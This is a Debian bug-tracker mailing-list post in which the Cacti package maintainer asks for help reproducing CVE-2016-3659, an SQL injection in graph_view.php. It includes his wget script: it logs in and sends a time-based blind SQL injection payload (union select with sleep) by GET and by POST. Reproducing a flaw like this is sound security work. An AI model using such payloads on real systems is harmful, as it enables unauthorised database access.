[Pkg-cacti-maint] Bug#820521: cacti: CVE-2016-3659: SQL injection vulnerability in graph_view.php

Fri Apr 29 04:33:48 UTC 2016

Control: tags -1 help

For the record of this bug.

I have not been able to reproduce this on my Debian system, and upstream
hasn't responded yet to the bug report. Any help in reproducing and
providing a script to reproducing is welcome. The script from the
upstream bug report does not reproduce the issue for me.

One data point, I have verified that the code we try to inject is valid
MySQL code in the Debian (sid) version and as such should delay if one
is able to trigger the vulnerability.

Paul

-------- Forwarded Message --------
Subject: reproducing vulnerability
Date: Sun, 10 Apr 2016 13:47:54 +0200
From: Paul Gevers <elbrus at debian.org>
To: Debian Security <security at debian.org>

Hi,

Call me dumb or ignorant, but even with multiple tries over the last
couple of days, I have not been able to reproduce a CVE¹ against my
package cacti. I have tried using wget with the code below and also in
my browser (iceweasel with "Web Developer" plugin) by changing "hidden"
fields to trigger the issue without success. Am I doing this wrong? Do
you have tips or tricks how to test these kind of security issues?

(Obviously, I am not doubting the CVE itself, although it may be so that
Debian is not vulnerable. I would be surprised though.)

#### Initializing stuff
database_pw=theAdminPasswordHere
tmpFile1=$(mktemp)
tmpFile2=$(mktemp)
cookieFile=$(mktemp)
loadSaveCookie="--load-cookies $cookieFile --keep-session-cookies
--save-cookies $cookieFile"

# Make sure we get the magic, this is stored in the cookies for future use.
wget --keep-session-cookies --save-cookies "$cookieFile"
--output-document="$tmpFile1" http://localhost/cacti/index.php
magic=$(grep "name='__csrf_magic' value=" "$tmpFile1" | sed
"s/.*__csrf_magic' value=\"//" | sed "s/\" \/>//")
postData="action=login&login_username=admin&login_password=${database_pw}&__csrf_magic=${magic}"
wget $loadSaveCookie --post-data="$postData"
--output-document="$tmpFile2" http://localhost/cacti/index.php

#### and then the real tries here:
# CVE-2016-3659 Unfortunately, I am not able to trigger the issue
wget $loadSaveCookie --timeout=10 --tries=1
"http://localhost/cacti/graph_view.php?action=tree&tree_id=1&leaf_id=7&nodeid=node1_7&host_group_data=graph_template:1
union select case when ord(substring((select version()) from 1 for 1))
between 53 and 53 then sleep(100) else 0 end"

wget $loadSaveCookie --timeout=10 --tries=1
--post-data="__csrf_magic=${magic}&action=tree&tree_id=1&leaf_id=7&nodeid=node1_7&host_group_data=graph_template:1%20union%20select%20case%20when%20ord(substring((select%20version())%20from%201%20for%201))%20between%2053%20and%2053%20then%20sleep(100)%20else%200%20end"
"http://localhost/cacti/graph_view.php"

Paul

¹ https://security-tracker.debian.org/tracker/CVE-2016-3659

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 473 bytes
Desc: OpenPGP digital signature
URL: <http://lists.alioth.debian.org/pipermail/pkg-cacti-maint/attachments/20160429/1ea0916e/attachment.sig>